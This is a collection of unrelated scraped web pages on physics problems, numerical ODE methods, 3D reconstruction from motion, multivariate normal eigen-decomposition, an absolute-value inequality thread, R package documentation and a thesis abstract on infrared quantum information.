Altaïr 49 Reputation 10 Feb 25 '18 +10 00:10 upvote Is emptiness of the intersection of the languages of two TMs decidable? 22 Dec 15 '14 +12 01:18 2 events Is emptiness of the intersection of the languages of two TMs decidable? +10 / -2 22:55 2 events Give an example of a non-regular language $L$ such that $L^*$ is regular +2 22:50 accept Give an example of a non-regular language $L$ such that $L^*$ is regular 12 Dec 14 '14 +10 / -2 16:14 2 events Let $L_4$ $\subseteq$ {0,1}$^*$ be the set of all palindromes whose first character is 1. Give a context-free grammar for $L_4$ +2 20:39 accept Let $L_4$ $\subseteq$ {0,1}$^*$ be the set of all palindromes whose first character is 1. Give a context-free grammar for $L_4$ +2 08:20 accept Proving correctness of a CFG by induction on length of strings generated -2 Nov 29 '14 2 Nov 23 '14 4 Nov 20 '14
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.48189297318458557, "perplexity": 1340.485484219434}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370505550.17/warc/CC-MAIN-20200401065031-20200401095031-00051.warc.gz"}
https://www.quantumstudy.com/a-uniform-cylinder-of-length-l-and-mass-m-having-cross-sectional-area-a-is-suspended-with-its-length-vertical/
# A uniform cylinder of length L and mass M having cross-sectional area A is suspended, with its length vertical… Q: A uniform cylinder of length L and mass M having cross-sectional area A is suspended, with its length vertical, from a fixed point by a massless spring, such that it is half-submerged in a liquid of density ρ at equilibrium position. When the cylinder is given a small downward push and released to starts oscillating vertically with a small amplitude. If the force constant of the spring is k , the frequency of oscillation of the cylinder is (a) $\large \frac{1}{2\pi} (\frac{k – A \rho g}{M})^{1/2}$ (b) $\large \frac{1}{2\pi} (\frac{k + A \rho g}{M})^{1/2}$ (c) $\large \frac{1}{2\pi} (\frac{k + \rho g L^2}{M})^{1/2}$ (d) $\large \frac{1}{2\pi} (\frac{k + A \rho g}{A \rho g})^{1/2}$ Ans: (b) Sol: Let cylinder is displaced by an amount x from its mean position . The net restoring force , $\large F = -(k x + A x \rho g)$ $\large M a = -(k x + A x \rho g)$ $\large a = -\frac{(k + A \rho g)}{M} x$ In S.H.M , a = -ω2 x Hence , $\large \omega^2 = \frac{(k + A \rho g)}{M}$ $\large \omega = \sqrt{\frac{(k + A \rho g)}{M}}$ Frequency of oscillation $\large f = \frac{\omega}{2\pi}$ $\large f = \frac{1}{2\pi}\sqrt{\frac{(k + A \rho g)}{M}}$
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9835326075553894, "perplexity": 682.8606552111929}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057447.52/warc/CC-MAIN-20210923195546-20210923225546-00697.warc.gz"}
http://www.physicsforums.com/showthread.php?t=601074
# Integrating 2nd order ODE using midpoint rule by Niles Tags: integrating, midpoint, order, rule P: 1,863 Hi I am trying to integrate Newtons equations for my system $$a = \frac{F}{m} = \frac{d^2x}{dt^2}$$ This is only for the first coordinate of the particle. I wish to do it for y and z as well, but let us just work with x for now to make it simple. The force in the x-direction depends on the velocity in the x-direction, vx, and the y- and z-coordinate. In other words $$F=F(v_x, y, z)$$ Now, I wish to solve this equation, and I have currently implemented an Euler method. This is how I iterate $$v_{n+1} = v_n + dt\cdot a(v_{x,n},y_n,z_n) \\ x_{n+1} = x_{n} + dt\cdot v_{n}$$ I now want to improve the error, and use a 2nd order Runge-Kutta method, i.e. the midpoint rule as briefly summarized here: http://www.efunda.com/math/num_ode/num_ode.cfm I am not quite sure how to do this. In the link they say that now I should generally write $$y_{n+1} = y_{n} + dt\cdot f(x_n + dt/2, y_n + k_1/2)$$ where $$k_1 = dt\cdot f(x_n, y_n).$$ This is where my confusion arises: What does $f(x_n + dt/2, y_n + k_1/2)$ correspond to for me? I would really appreciate a hint or two with this. Best, Niles. P: 26 Here you have it explained: Computational physics page 292, "13.4 More on finite difference methods, Runge-Kutta methods" P: 1,863 Thanks! Related Discussions Calculus & Beyond Homework 0 Programming & Computer Science 0 Calculus & Beyond Homework 3 Calculus & Beyond Homework 2 Calculus & Beyond Homework 1
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9368162751197815, "perplexity": 484.22280851315713}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223201753.19/warc/CC-MAIN-20140423032001-00242-ip-10-147-4-33.ec2.internal.warc.gz"}
https://jack.valmadre.net/papers/2012-cvpr-filters/
Consider a 3D object deforming non-rigidly over time, for example: The object is observed by a single moving camera. We want to recover the 3D structure from these 2D projection correspondences. Let’s assume that the camera motion relative to the background can be recovered using rigid structure from motion. With known cameras, each 2D projection of a point defines a 2x3 linear system of equations for its 3D position in that frame. The 1D nullspace of this system corresponds geometrically to a ray departing from the camera centre. This means that using only projection constraints, there are infinite solutions for each point in each frame (anywhere along those rays). However, we know intuitively that points should not jump around arbitrarily from frame to frame. Assuming that the points have mass, their motion should be smooth (since they must be accelerated by a finite force). This notion was leveraged by Akhter et al (2008), who required that the trajectory of each point be expressed as a sum of low frequency sinusoids i.e. lie on the subspace of a truncated DCT basis. Stacking the equations for the observation of a point in all F frames yields a 2Fx3F system. Introducing a K-dimensional DCT basis for the x, y and z components of the trajectory, the system of equations becomes 2Fx3K. While this problem is not necessarily underconstrained if 3K ≤ 2F, Park et al (2010) found that significant camera motion was also required to obtain an accurate reconstruction, establishing the notion of reconstructability. The following figure shows reconstruction error versus camera speed for varying basis size K, generated from a synthetic experiment in which human motion capture sequences (of 100 frames) are observed by an orbiting camera. The key observation here is that faster moving cameras enable more accurate reconstruction. However, you have to choose the basis size correctly or else you will either run out of capacity to represent the points’ motion (to the right) or revert to an ill-posed problem (to the left). Park et al defined a measure of reconstructability depending on how well the camera trajectory was represented by the basis, since, if the camera centre lies on the basis, its trajectory is a trivial solution. We defined a new measure based on a theoretical bound on the reconstruction error. Our measure does not depend on the camera centre, rather, it incorporates the condition number of the linear system of equations, the ratio of the largest eigenvalue to the smallest. The implications of this become clearer when we alternatively consider minimising the distance of the trajectory from the DCT subspace, subject to the 2D projections being exactly satisfied. Since the DCT matrix is rank 3K, the orthogonal projection matrix in the objective will have a nullspace of dimension 3K. When we reduce K, we reduce the size of this nullspace and therefore reduce the likelihood of having a poorly-conditioned system. Consider the more general form We propose that the conditioning problem can be mostly avoided by choosing where multiplication by the matrix G is equivalent to convolution with the filter g (note that we define vector convolution to operate independently in x, y, z.) We typically choose simple finite difference filters: some combination of (-1, 1) and (-1, 2, -1). If the filter has support m, then the matrix M has a nullspace of size 3(m-1), since we only compute the convolution with parts of the signal where the two inputs overlap completely (i.e. “valid” mode in Matlab’s conv() function). Using these “trajectory filters,” we are able to achieve 3D error at the limit of reconstructability without having to choose the basis size K. The reason that this works becomes evident examining the eigenspectra of the DCT matrix (left) versus the first-difference (middle) and second-difference (right) filters. The filters do not have the many zero eigenvalues which cause the system to become poorly conditioned. A nice twist here is that the Discrete Cosine Transform diagonalises symmetric convolution in an analogous way to the Fourier transform diagonalising periodic convolution, so the eigenspectra above are actually the DCT transform of each filter. This means we can enforce the filters as a weighting in the DCT domain, although in practice it is usually more efficient to work in the time domain because the systems are sparse. This also makes it possible to reveal the filter which is equivalent to using a particular truncation of the DCT basis. The final results from our example are shown below. Red points denote the output and black the ground truth. ### Code I’ve tried to provide sufficient code and data to reproduce the figures in the paper. It’s all Matlab. Never tested with GNU Octave. This code is provided for free use, no warranty whatsoever. Run setup.m to set the path as required. The main figures (reconstruction error versus camera speed) can be generated by running solver_experiment.m. Note that averaging these experiments over as many trials as we did probably requires a compute cluster or significant hours. You can reduce the number of trials though, for slightly less-smooth curves. This experiment depends on Honglak Lee et al’s implementation of their feature-sign search algorithm for the comparison to sparse coding methods. Ensure that l1ls_featuresign.m is found in src/lee-2006/. I’m also providing the exact 100-frame mocap sequences from the CMU Motion Capture Database which we used. Thanks to Mark Cox for converting them to point clouds. Put this file in data/ before running solver_experiment.m. The actual reconstruction code is super simple and happens in reconstruct_filters.m and reconstruct_linear.m. The linear systems for projection constraints are constructed in trajectory_projection_equations.m, projection_equation.m and independent_to_full.m. The qualitative examples from real photos are generated by running real_scene_demo.m. To do this, you’ll need to download the “Real scene” data from Hyun Soo Park’s project page and unzip it to data/RealSceneData/. I’ve also re-distributed two small functions from his code in src/park-2010/.
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8326136469841003, "perplexity": 856.9797816535608}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145960.92/warc/CC-MAIN-20200224132646-20200224162646-00167.warc.gz"}
http://stephens999.github.io/fiveMinuteStats/mvnorm_eigen.html
Last updated: 2021-03-01 Checks: 7 0 Knit directory: fiveMinuteStats/analysis/ This reproducible R Markdown analysis was created with workflowr (version 1.6.2). The Checks tab describes the reproducibility checks that were applied when the results were created. The Past versions tab lists the development history. Great! Since the R Markdown file has been committed to the Git repository, you know the exact version of the code that produced these results. Great job! The global environment was empty. Objects defined in the global environment can affect the analysis in your R Markdown file in unknown ways. For reproduciblity it’s best to always run the code in an empty environment. The command set.seed(12345) was run prior to running the code in the R Markdown file. Setting a seed ensures that any results that rely on randomness, e.g. subsampling or permutations, are reproducible. Great job! Recording the operating system, R version, and package versions is critical for reproducibility. Nice! There were no cached chunks for this analysis, so you can be confident that you successfully produced the results during this run. Great job! Using relative paths to the files within your workflowr project makes it easier to run your code on other machines. Great! You are using Git for version control. Tracking code development and connecting the code version to the results is critical for reproducibility. The results in this page were generated with repository version 669e3a7. See the Past versions tab to see a history of the changes made to the R Markdown and HTML files. Note that you need to be careful to ensure that all relevant files for the analysis have been committed to Git prior to generating the results (you can use wflow_publish or wflow_git_commit). workflowr only checks the R Markdown file, but you know if there are other scripts or data files that it depends on. Below is the status of the Git repository when the results were generated: Ignored files: Ignored: .Rhistory Ignored: .Rproj.user/ Ignored: analysis/.Rhistory Ignored: analysis/bernoulli_poisson_process_cache/ Untracked files: Untracked: _workflowr.yml Untracked: analysis/CI.Rmd Untracked: analysis/gibbs_structure.Rmd Untracked: analysis/libs/ Untracked: analysis/results.Rmd Untracked: analysis/shiny/tester/ Unstaged changes: Modified: analysis/LR_and_BF.Rmd Modified: analysis/MH-examples1.Rmd Modified: analysis/MH_intro.Rmd Deleted: analysis/r_simplemix_extended.Rmd Note that any generated files, e.g. HTML, png, CSS, etc., are not included in this status report because it is ok for generated content to have uncommitted changes. These are the previous versions of the repository in which changes were made to the R Markdown (analysis/mvnorm_eigen.Rmd) and HTML (docs/mvnorm_eigen.html) files. If you’ve configured a remote Git repository (see ?wflow_git_remote), click on the hyperlinks in the table below to view the files as they were in that past version. File Version Author Date Message Rmd 669e3a7 Matthew Stephens 2021-03-01 workflowr::wflow_publish(“mvnorm_eigen.Rmd”) library(mvtnorm) Warning: package 'mvtnorm' was built under R version 3.6.2 ## Pre-requisites You should be familiar with the Multivariate normal distribution, and with the eigen-decomposition for symmetric positive semi-definite (PSD) matrices. ## Introduction Getting an intuition for what the $$p$$-dimensional multivariate normal distribution, $$N_p(\mu,\Sigma)$$, “looks like” can be difficult. For $$p=1,2$$ things are not too bad: we can directly visualize a univariate normal distribution by plotting its density, and visualize a bivariate normal distribution by plotting a contour plot of the density, or by simulating samples from the distribution and visualizing them using a 2d scatterplot. For example, the following code does this for $$N(0,\Sigma)$$ where $\Sigma = \begin{pmatrix} 1.0 & 0.7 \\ 0.7 & 1.0 \end{pmatrix}$: Sigma= cbind(c(1,0.7),c(0.7,1)) X = rmvnorm(1000,c(0,0),Sigma) plot(X[,1],X[,2],main="Samples from bivariate normal with variance Sigma",asp=1) But in $$p=100$$ dimensions, or even just $$p=4$$ dimensions, things become much harder because direct visualization is impractical. So how can we get intuition about the multivariate normal distribution, $$N_p(\mu,\Sigma)$$ when $$p$$ is large? Note first that the mean $$\mu$$ is just a vector of $$p$$ numbers, and generally causes few problem in interpretation: you can just think of each number as specifying the mean in each of the $$p$$ coordinates one at a time. In contrast, the covariance matrix $$\Sigma$$ is a $$p \times p$$ matrix that captures potentially more complex patterns, and creates more challenges for intuition. One possible approach is to plot a heatmap of this matrix, and this can certainly be helpful in certain situations. However, this vignette describes a more algebraic approach, based on the eigen-decomposition of $$\Sigma$$. ## Some linear algebra Recall that any valid $$p \times p$$ covariance matrix $$\Sigma$$ must be symmetric and positive semi-definite (PSD). Furthermore, recall that any such PSD matrix must have eigen-decomposition: $\Sigma = V \Lambda V'$ where: • $$\Lambda$$ is a $$K \times K$$ diagonal matrix with the non-zero eigenvalues of $$\Sigma$$, $$\lambda_1,\dots,\lambda_K$$ say, on the diagonal ($$K \leq p$$ is the rank of $$\Sigma$$). • $$V$$ is a $$p \times K$$ orthonormal matrix ($$V'V=I_K$$), whose columns $$v_1,\dots,v_K$$ are the normalized eigenvectors of $$\Sigma$$ corresponding to the non-zero eigenvalues. Recall also that if $$Z \sim N_p(0, I_p)$$ and $$A$$ is any $$n \times p$$ matrix then $$\mu + AZ \sim N(\mu, AA')$$. Now apply this last result with $$A= V \Lambda^{0.5}$$ where $$\Lambda^{0.5}$$ is the diagonal matrix with $$\lambda_1^{0.5},\dots,\lambda_K^{0.5}$$ on the diagonal. We get $\mu + V \Lambda^{0.5} Z \sim N_p(\mu, V \Lambda^{0.5} \Lambda^{0.5} V').$ That is, $\mu + V \Lambda^{0.5} Z \sim N_p(\mu, \Sigma).$ We can write the matrix multiple $$V\Lambda^{0.5} Z$$ as a sum to make the structure more obvious: $\mu + \sum_{k=1}^K \lambda_k^{0.5} z_k v_k \sim N_p(\mu, \Sigma).$ Here $$\mu$$ and $$v_1,\dots,v_K$$ are all column vector of length $$p$$, whereas the $$\lambda_k$$ and $$z_k$$ are all scalars. ### Interpration as a random linear combination of eigenvectors From this algebra, if $$X \sim N_p(\mu,\Sigma)$$, then we can think of $$X$$ as being generated by taking the mean $$\mu$$, and adding a random linear combination of the eigenvectors of $$\Sigma$$. Specifically $X = \mu + \sum_{k=1}^K b_k v_k,$ where the weights $b_k=\lambda_k^{0.5} z_k \sim N(0,\lambda_k).$ are independent of one another. Note that if $$\lambda_k$$ is small then $$b_k \approx 0$$, so the eigenvectors with small eigenvalues contribute little to $$X$$, and we can focus on the eigenvectors with large eigenvalues. Indeed, this approach provides the simplest insights when most of the $$\lambda_k$$ are negligible, and only one or two eigenvectors contribute meaningfully to the sum. ## Example: rank 1 covariance To make a simple example, set $$\mu=0$$ and assume $$\Sigma$$ is a rank 1 matrix. That is, $$\Sigma$$ has only one eigenvector: $\Sigma = \lambda vv'$ for some $$p$$-vector $$v$$. In this case the algebra above gives the representation $$X= b v$$ where $$b \sim N(0,\lambda)$$. That is $$X$$ is simply a multiple of $$v$$, where the multiplier is randomly distributed from a univariate normal. Thus in this case the randomness in $$X$$ boils down to the randomness in a single random univarate normal, which is easy to visualize. To give a specific example, suppose that $$v$$ is the vector of all 1s $$v=(1,\dots,1)$$ and $$\lambda=1$$. That is $$\Sigma$$ is a matrix of all 1s. Then $$X= (b,b,b,\dots,b)$$ where $$b \sim N(0,1)$$. To give another specific example, if $$v=(-1,-1,-1,1,1)$$ and $$\lambda=2$$ then $$X= (-b,-b,-b,b,b)$$ where $$b \sim N(0,2)$$. sessionInfo() R version 3.6.0 (2019-04-26) Platform: x86_64-apple-darwin15.6.0 (64-bit) Running under: macOS 10.16 Matrix products: default BLAS: /Library/Frameworks/R.framework/Versions/3.6/Resources/lib/libRblas.0.dylib LAPACK: /Library/Frameworks/R.framework/Versions/3.6/Resources/lib/libRlapack.dylib locale: [1] en_US.UTF-8/en_US.UTF-8/en_US.UTF-8/C/en_US.UTF-8/en_US.UTF-8 attached base packages: [1] stats graphics grDevices utils datasets methods base other attached packages: [1] mvtnorm_1.1-1 loaded via a namespace (and not attached): [1] Rcpp_1.0.6 rstudioapi_0.11 whisker_0.4 knitr_1.29 [5] magrittr_1.5 workflowr_1.6.2 R6_2.4.1 rlang_0.4.8 [9] stringr_1.4.0 tools_3.6.0 xfun_0.16 git2r_0.27.1 [13] htmltools_0.5.0 ellipsis_0.3.1 yaml_2.2.1 digest_0.6.27 [17] rprojroot_1.3-2 tibble_3.0.4 lifecycle_0.2.0 crayon_1.3.4 [21] later_1.1.0.1 vctrs_0.3.4 fs_1.5.0 promises_1.1.1 [25] glue_1.4.2 evaluate_0.14 rmarkdown_2.3 stringi_1.4.6 [29] compiler_3.6.0 pillar_1.4.6 backports_1.1.10 httpuv_1.5.4 [33] pkgconfig_2.0.3 This site was created with R Markdown
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7707247734069824, "perplexity": 1081.1755244345593}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570730.59/warc/CC-MAIN-20220807211157-20220808001157-00255.warc.gz"}
https://math.stackexchange.com/questions/244718/double-absolute-values
# double absolute values I am having a little bit of problem with an inequality with nested absolute values: $$|z^2-1| \ge |z+|1-z^2||$$ I've tried solving it by making three cases, $z\ge1$, $z\le-1$ and $z$ between $1$ and $-1$ and thus getting rid of absolute values for $z^2-1$ and $1-z^1$, and I am only left with 1 absolute value. But solutions at the end are not what they should be based on the graph. Here, $z$ is real, and WolframAlpha gives this solution. What I am doing wrong? Note that for any $a$ and $b$, we have $|a|\ge |b|$ iff $a^2 \ge b^2$. Apply this with $a$ the left-hand side, and $b$ the right-hand side of our expression. Thus our inequality is equivalent to $$(z^2-1)^2\ge z^2+2z|1-z^2| +(1-z^2)^2.$$ Since $(z^2-1)^2=(1-z^2)^2$, we are trying to solve the inequality $$z^2+2z|1-z^2| \le 0.\tag{1}$$ Sure killed an awful lot of absolute value signs! The inequality $(1)$ holds at $z=0$. And it is obvious that it cannot hold for positive $z$. So (remembering that from now on $z$ is negative), we are looking at the inequality $$z+2|1-z^2| \ge 0.$$ The rest is routine. We can divide into two cases, $z\le -1$ and $-1\lt z\lt 0$. It turns out that the inequality holds for all $z \le 0$, except for the numbers in the open interval $(a,b)$, where $a=-\frac{\sqrt{17}+1}{4}$ and $b= -\frac{\sqrt{17}-1}{4}$. I am presuming that $z$ is real. The problem is that the outer absolute on the right may change sense at other places. Say $z \lt -1$. Then $|z+|1-z^2||=|z+z^2-1|$, but now you are testing whether $z+z^2-1 \gt 0$ which doesn't change sense at those points. So you need to find some secondary cases based on what you get for the prime cases. $|z^2-1| \ge |z+|1-z^2||$ Case 1: Suppose $z \ge 1$. Then $|z^2 - 1| = z^2 - 1$ and $|1 - z^2| = z^2 - 1$: $z^2-1 \ge |z+(z^2-1)||$ Also $z + (z^2 - 1) > 0$ so: $z^2-1 \ge z+(z^2-1)$ $0 \ge z$ This is a contradiction. Case 2: Suppose $z \le -1$. Then $|z^2 - 1| = z^2 - 1$ and $|1 - z^2| = z^2 - 1$: $z^2-1 \ge |z+(z^2-1)||$ There is a root of $z^2 + z - 1$, so we must case on that. Case 2a: Suppose $z \le -\frac{\sqrt5 + 1}{2}$, then: $z^2-1 \ge z^2+z-1$ Case 2b: Suppose $-\frac{\sqrt5 + 1}{2} \le z \le -1$, then $z^2-1 \ge -z^2-z+1 \Rightarrow 2z^2 + z \ge 0$. $z \le -\frac{\sqrt5 + 1}{2}$ always satisfies this. Case 3: Suppose $-1 \le z \le 1$, then $1-z^2 \ge |z+1-z^2)|$ This has a root at $\frac{1-\sqrt5}{2}$, so we case there, Case 3a: $\frac{1-\sqrt5}{2} \le z \le 1$ $1-z^2 \ge z+1-z^2)$ $0 \ge z$. $\frac{1-\sqrt5}{2} \le z \le 0$ satisfies this. Case 3b: $-1 \le z \le \frac{1-\sqrt5}{2}$. $1-z^2 \ge z^2-z-1$ $2z^2 - z \le 0$. This does not hold for negative $z$, so it is a contradiction. We conclude that $z \le -\frac{\sqrt5 + 1}{2}$ or $\frac{1-\sqrt5}{2} \le z \le 0$. The graphing method is definitely easier here. It also may be easier to consider the potential roots first and then use more cases instead of cases-with-subcases, though ultimately those are similar arguments. Here is a solution $$|z+|1-z^2||\leq |1-z^2| \implies -|1-z^2|\leq z+|1-z^2|\leq |1-z^2|$$ $$\implies -2|1-z^2|\leq z\leq 0 \,.$$ From the above inequality, the solution $z$ should lie in the set $\left\{z\leq 0\right\} \cap \left\{ z\geq-2|1-z^2| \right\}$. working out $z \geq -2|1-z^2|,$ gives $$\left\{z \geq -2|1-z^2| \right\} = \left\{z \geq -2(1-z^2) \right\} \cup \left\{z \geq -2(-1+z^2) \right\}$$ $$= ( -.78, 1.28 ) \cup \left\{ (-\infty, -1.28)\cup (-.78,\infty) \right\}$$ $$= (-\infty, -1.28) \cup ( -.78, \infty ) .$$ Thus, the solution is given by $$\left\{z\leq 0\right\} \cap \left\{ z\geq -2|1-z^2| \right\}$$ $$=\left\{z\leq 0\right\} \cap \left\{ (-\infty, -1.28) \cup ( -.78, \infty ) \right\}$$ $$=\left\{\left\{z\leq 0\right\} \cap (-\infty, -1.28)\right\} \cup \left\{\left\{z\leq 0\right\} \cap ( -.78, \infty )\right\}$$ $$= \left( -\infty,-1.28\right) \cup \left(-.78, 0 \right).$$ Note: I approximated the roots when I was solving the inequalities.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.984227180480957, "perplexity": 163.5538585046446}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488539764.83/warc/CC-MAIN-20210623165014-20210623195014-00598.warc.gz"}
https://search.r-project.org/CRAN/refmans/cholera/html/addNeighborhoodCases.html
## Add observed cases by neighborhood. ### Description Add cases to a plot as "address" or "fatalities" and as points or IDs. ### Usage addNeighborhoodCases(pump.subset = NULL, pump.select = NULL, metric = "walking", type = "stack.base", token = "point", text.size = 0.5, pch = 16, point.size = 0.5, vestry = FALSE, weighted = TRUE, color = NULL, case.location = "nominal", alpha.level = 0.5, multi.core = TRUE) ### Arguments pump.subset Numeric. Vector of numeric pump IDs to subset from the neighborhoods defined by pump.select. Negative selection possible. NULL uses all pumps in pump.select. pump.select Numeric. Numeric vector of pump IDs that define which pump neighborhoods to consider (i.e., specify the "population"). Negative selection possible. NULL selects all pumps. metric Character. Type of neighborhood: "euclidean" or "walking". type Character. Type of case: "stack.base" (base of stack), or "stack" (entire stack). For observed = TRUE. token Character. Type of token to plot: "point" or "id". text.size Numeric. Size of case ID text. pch Numeric. point.size Numeric. vestry Logical. TRUE uses the 14 pumps from the Vestry Report. FALSE uses the 13 in the original map. weighted Logical. TRUE computes shortest walking path weighted by road length. FALSE computes shortest walking path in terms of the number of nodes. color Character. Use a single color for all paths. NULL uses neighborhood colors defined by snowColors(). case.location Character. For metric = "euclidean": "address" uses ortho.proj; "nominal" uses fatalities. alpha.level Numeric. Alpha level transparency for area plot: a value in [0, 1]. multi.core Logical or Numeric. TRUE uses parallel::detectCores(). FALSE uses one, single core. You can also specify the number logical cores. See vignette("Parallelization") for details. ### Examples ## Not run:
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2628030776977539, "perplexity": 29575.14758938939}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943746.73/warc/CC-MAIN-20230321193811-20230321223811-00675.warc.gz"}
https://open.library.ubc.ca/soa/cIRcle/collections/ubctheses/24/items/1.0370937
# Open Collections ## UBC Theses and Dissertations ### Infrared quantum information Chaurette, Laurent #### Abstract Scattering amplitudes in massless gauge field theories have long been known to give rise to infrared divergent effects from the emission of very low energy gauge bosons. The traditional way of dealing with those divergences has been to abandon the idea of measuring amplitudes by only focusing on inclusive cross-sections constructed out of physically equivalent states. An alternative option, found to be consistent with the S-matrix framework, suggested to dress asymptotic states of charged particles by shockwaves of low energy bosons. In this formalism, the clouds of soft bosons, when tuned appropriately, cancel the usual infrared divergences occurring in the standard approach. Recently, the dressing approach has received renewed attention for its connection with newly discovered asymptotic symmetries of massless gauge theories and its potential role in the black hole information paradox. We start by investigating quantum information properties of scattering theory while having only access to a subset of the outgoing state. We give an exact formula for the von Neuman entanglement entropy of an apparatus particle scattered off a set of system particles and show how to obtain late-time expectation values of apparatus observables. We then specify to the case of quantum electrodynamics (QED) and gravity where the unobserved system particles are low energy photons and gravitons. Using the standard inclusive cross-section formalism, we demonstrate that those soft bosons decohere nearly all momentum superpositions of hard particles. Repeating a similar computation 